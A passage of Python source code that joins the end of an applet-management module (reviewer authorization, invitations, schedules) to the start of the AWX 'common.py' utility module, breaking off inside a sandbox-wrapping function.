target=AppletModel().updateUserCacheAllUsersAllRoles,
args=(applet, thisUser)
)
thread.start()
return(appletMeta)
def authorizeReviewer(applet, reviewer, user):
thisUser = Applet().getCurrentUser()
user = UserModel().load(
user,
level=AccessType.NONE,
user=thisUser
)
try:
applet = FolderModel().load(
applet,
level=AccessType.READ,
user=thisUser
)
responsesCollection = FolderModel().createFolder(
parent=user,
name='Responses',
parentType='user',
public=False,
creator=thisUser,
reuseExisting=True
)
thisApplet = list(FolderModel().childFolders(
parent=responsesCollection,
parentType='folder',
user=thisUser,
filters={
'meta.applet.@id': str(applet['_id'])
}
))
thisApplet = thisApplet[0] if len(
thisApplet
) else FolderModel().setMetadata(
FolderModel().createFolder(
parent=responsesCollection,
name=FolderModel().preferredName(applet),
parentType='folder',
public=False,
creator=thisUser,
allowRename=True,
reuseExisting=False
),
{
'applet': {
'@id': str(applet['_id'])
}
}
)
accessList = thisApplet['access']
accessList['users'].append({
"id": reviewer,
"level": AccessType.READ
})
thisApplet = FolderModel().setAccessList(
thisApplet,
accessList,
save=True,
recurse=True,
user=thisUser
)
except:
thisApplet = None
return(thisApplet)
def authorizeReviewers(assignment):
assignment = assignment.get('meta', assignment)
thisUser = Applet().getCurrentUser()
allUsers = []
reviewAll = []
members = assignment.get('members', [])
applet = assignment.get('applet').get('@id')
for member in [member for member in members if 'roles' in member]:
try:
if member['roles']['user']:
allUsers.append(getCanonicalUser(member.get("@id")))
except:
pass
if 'reviewer' in member['roles']:
if "ALL" in member['roles']['reviewer']:
reviewAll.append(getCanonicalUser(member.get("@id")))
for user in [
user for user in member['roles'][
'reviewer'
] if user not in SPECIAL_SUBJECTS
]:
authorizeReviewer(
assignment.get('applet').get('@id'),
getCanonicalUser(member.get('@id')),
getCanonicalUser(user)
)
for reviewer in reviewAll:
[authorizeReviewer(
assignment.get('applet').get('@id'),
reviewer,
user
) for user in allUsers]
return(None)
def _invite(applet, user, role, rsvp, subject):
"""
Helper function to invite a user to an applet.
:param applet: Applet to invite user to
:type applet: AppletModel
:param user: ID (canonical or applet-specific) or email address of user to
invite
:type user: string
:param role: Role to invite user to
:type role: string
:param rsvp: Require user acceptance?
:type rsvp: boolean
:param subject: Subject about 'user' role can inform or about which
'reviewer' role can review
:type subject: string or literal
:returns: New assignment (dictionary)
"""
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
thisUser = Applet().getCurrentUser()
user = user if user else str(thisUser['_id'])
if bool(rsvp):
groupName = {
'title': '{} {}s'.format(
str(applet.get('_id')),
role
)
}
groupName['lower'] = groupName.get('title', '').lower()
group = GroupModel().findOne(query={'lowerName': groupName['lower']})
if not group or group is None:
group = GroupModel().createGroup(
name=groupName['title'],
creator=thisUser,
public=bool(role in ['manager', 'reviewer'])
)
try:
assignments = CollectionModel().createCollection(
name="Assignments",
public=True,
reuseExisting=True
)
assignmentType = 'collection'
except AccessException:
assignments, assignmentType = selfAssignment()
appletAssignment = list(FolderModel().childFolders(
parent=assignments,
parentType=assignmentType,
user=thisUser,
filters={
'meta.applet.@id': str(applet['_id']) if '_id' in applet else None
}
))
appletAssignment = appletAssignment[0] if len(
appletAssignment
) else FolderModel().setMetadata(
FolderModel().createFolder(
parent=assignments,
name=FolderModel().preferredName(applet),
parentType=assignmentType,
public=False,
creator=thisUser,
allowRename=True,
reuseExisting=False
),
{
'applet': {
'@id': str(applet['_id']) if '_id' in applet else None
}
}
)
meta = appletAssignment.get('meta', {})
members = meta.get('members', []) if meta.get(
'members'
) is not None else []
cUser = getUserCipher(appletAssignment, user)
subject = subject.upper() if subject is not None and subject.upper(
) in SPECIAL_SUBJECTS else getUserCipher(
appletAssignment,
str(thisUser['_id']) if subject is None else subject
)
thisAppletAssignment = {
'@id': str(cUser),
'roles': {
role: True if role not in [
'reviewer',
'user'
] else [
subject
]
}
}
for i, u in enumerate(members):
if '@id' in u and u["@id"]==str(cUser):
thisAppletAssignment = members.pop(i)
if 'roles' not in thisAppletAssignment:
thisAppletAssignment['roles'] = {}
thisAppletAssignment['roles'][
role
] = True if role not in [
'reviewer',
'user'
] else [
subject
] if (
subject in SPECIAL_SUBJECTS
) or (
'reviewer' not in thisAppletAssignment[
'roles'
]
) else list(set(
thisAppletAssignment['roles']['reviewer'] + [subject]
).difference(set(
SPECIAL_SUBJECTS
))) if "ALL" not in thisAppletAssignment['roles'][
'reviewer'
] else ["ALL"]
members.append(thisAppletAssignment)
meta['members'] = members
appletAssignment = FolderModel().setMetadata(appletAssignment, meta)
authorizeReviewers(appletAssignment)
return(appletAssignment)
def selfAssignment():
thisUser = Applet().getCurrentUser()
assignmentsFolder = FolderModel().createFolder(
parent=thisUser,
parentType='user',
name='Assignments',
creator=thisUser,
public=False,
reuseExisting=True
)
return((
assignmentsFolder,
'folder'
))
def _setConstraints(applet, activity, schedule, user, refreshCache=False):
"""
Helper function for method recursion.
:param applet: applet Object
:type applet: dict
:param activity: Activity ID
:type activity: str, list, or None
:param schedule: schedule data
:type schedule: dict, list, or None
:param user: user making the call
:type user: dict
:returns: updated applet Object
"""
if activity is None:
if schedule is not None:
appletMeta = applet.get('meta', {})
appletMeta['applet']['schedule'] = schedule
applet = AppletModel().setMetadata(applet, appletMeta)
return(applet)
if isinstance(activity, str) and activity.startswith('['):
try:
activity = [
activity_.replace(
"'",
""
).replace(
'"',
''
).strip() for activity_ in activity[1:-1].split(',')
]
except (TypeError, AttributeError) as e:
print(e)
if isinstance(activity, list):
for activity_ in activity:
applet = _setConstraints(
applet,
activity_,
schedule,
user
)
return(applet)
try:
activityLoaded = ActivityModel().getFromUrl(
activity,
'activity',
thisUser,
refreshCache
)[0]
except:
activityLoaded = ActivityModel().load(
activity,
AccessType.WRITE,
user
)
try:
activityMeta = activityLoaded['meta'].get('activity')
except AttributeError:
raise ValidationException(
'Invalid activity.',
'activity'
)
activityKey = activityMeta.get(
'url',
activityMeta.get(
'@id',
activityLoaded.get(
'_id'
)
)
)
if activityKey is None:
raise ValidationException(
'Invalid activity.',
'activity'
)
else:
activityKey = jsonld_expander.reprolibPrefix(activityKey)
protocolExpanded = jsonld_expander.formatLdObject(
applet,
'applet',
user
).get('applet', {})
protocolOrder = protocolExpanded.get('ui', {}).get('order', [])
framedActivityKeys = [
protocolOrder[i] for i, v in enumerate(
protocolExpanded.get(
"reprolib:terms/order"
)[0].get(
"@list"
)
) if jsonld_expander.reprolibPrefix(v.get("@id"))==activityKey
]
if schedule is not None:
appletMeta = applet.get('meta', {})
scheduleInApplet = appletMeta.get('applet', {}).get('schedule', {})
for k in framedActivityKeys:
scheduleInApplet[k] = schedule
appletMeta['applet']['schedule'] = scheduleInApplet
applet = AppletModel().setMetadata(applet, appletMeta)
return(applet)
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize',
'memoize_delete', 'get_ansible_version', 'get_licenser', 'get_awx_http_client_headers',
'get_awx_version', 'update_scm_url', 'get_type_for_model', 'get_model_for_type',
'copy_model_by_class', 'copy_m2m_relationships',
'prefetch_page_capabilities', 'to_python_boolean', 'ignore_inventory_computed_fields',
'ignore_inventory_group_removal', '_inventory_updates', 'get_pk_from_dict', 'getattrd',
'getattr_dne', 'NoDefaultProvided', 'get_current_apps', 'set_current_apps',
'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity',
'get_cpu_capacity', 'get_mem_capacity', 'wrap_args_with_proot', 'build_proot_temp_dir',
'check_proot_installed', 'model_to_dict', 'NullablePromptPseudoField',
'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError',
'get_custom_venv_choices', 'get_external_account', 'task_manager_bulk_reschedule',
'schedule_task_manager', 'classproperty', 'create_temporary_fifo', 'truncate_stdout'
]
def get_object_or_400(klass, *args, **kwargs):
'''
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
'''
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def camelcase_to_underscore(s):
'''
Convert CamelCase names to lowercase_with_underscore.
'''
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
'''
Convert lowercase_with_underscore names to CamelCase.
'''
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
'''
Logging filter to output when in DEBUG mode or running tests.
'''
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
'''
Decorator to wrap a function and cache its result.
'''
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize()
def get_ansible_version():
'''
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
'''
try:
proc = subprocess.Popen(['ansible', '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
def get_awx_version():
'''
Return AWX version as reported by setuptools.
'''
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format(
'AWX' if license == 'open' else 'Red Hat Ansible Tower',
get_awx_version(),
license
)
}
return headers
def get_licenser(*args, **kwargs):
from awx.main.utils.licensing import Licenser, OpenLicense
try:
if os.path.exists('/var/lib/awx/.tower_version'):
return Licenser(*args, **kwargs)
else:
return OpenLicense()
except Exception as e:
raise ValueError(_('Error importing Tower License: %s') % e)
def update_scm_url(scm_type, url, username=True, password=True,
check_special_cases=True, scp_format=False):
'''
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
'''
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
#if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
#if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
#raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {
'user': ['last_login'],
'oauth2accesstoken': ['last_used'],
'oauth2application': ['client_secret']
}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed_by_tower and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (
isinstance(field_val, str) and
field_val.startswith('$encrypted$')
):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not(old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not(new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
'''
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
'''
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
'''
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
'''
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
'''
Return type name for a given model class.
'''
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
'''
Return model class for a given type name.
'''
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
'''
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
'''
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(Q(
Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
Q(**{'%s__isnull' % res_path: True})))
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(
_('Input type `{data_type}` is not a dictionary').format(
data_type=data_type)
)
def parse_yaml_or_json(vars_str, silent_failure=True):
'''
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
'''
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_(
'Variables not compatible with JSON standard (error: {json_error})').format(
json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(_(
'Cannot parse as JSON (error: {json_error}) or '
'YAML (error: {yaml_error}).').format(
json_error=str(json_err), yaml_error=str(yaml_err)))
return vars_dict
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
'''
Measure system memory and use it as a baseline for determining the system's capacity
'''
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
'''
Context manager to ignore updating inventory computed fields.
'''
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times.
"""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
'''
Context manager to ignore moving groups/hosts when group is deleted.
'''
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
'''
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
'''
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
@memoize()
def check_proot_installed():
'''
Check that proot is installed.
'''
from django.conf import settings
cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
logger.exception('bwrap unavailable for unexpected reason.')
return False
def build_proot_temp_dir():
'''
Create a temporary directory for proot to use.
'''
from django.conf import settings
path = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
return path
def wrap_args_with_proot(args, cwd, **kwargs):
'''
Wrap existing command line with proot to restrict access to:
- AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
For non-isolated nodes:
- /etc/tower (to prevent obtaining db info or secret key)
- /var/lib/awx (except for current project)
- /var/log/tower
- /var/log/supervisor
'''
from django.conf import settings
cwd = os.path.realpath(cwd)
new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
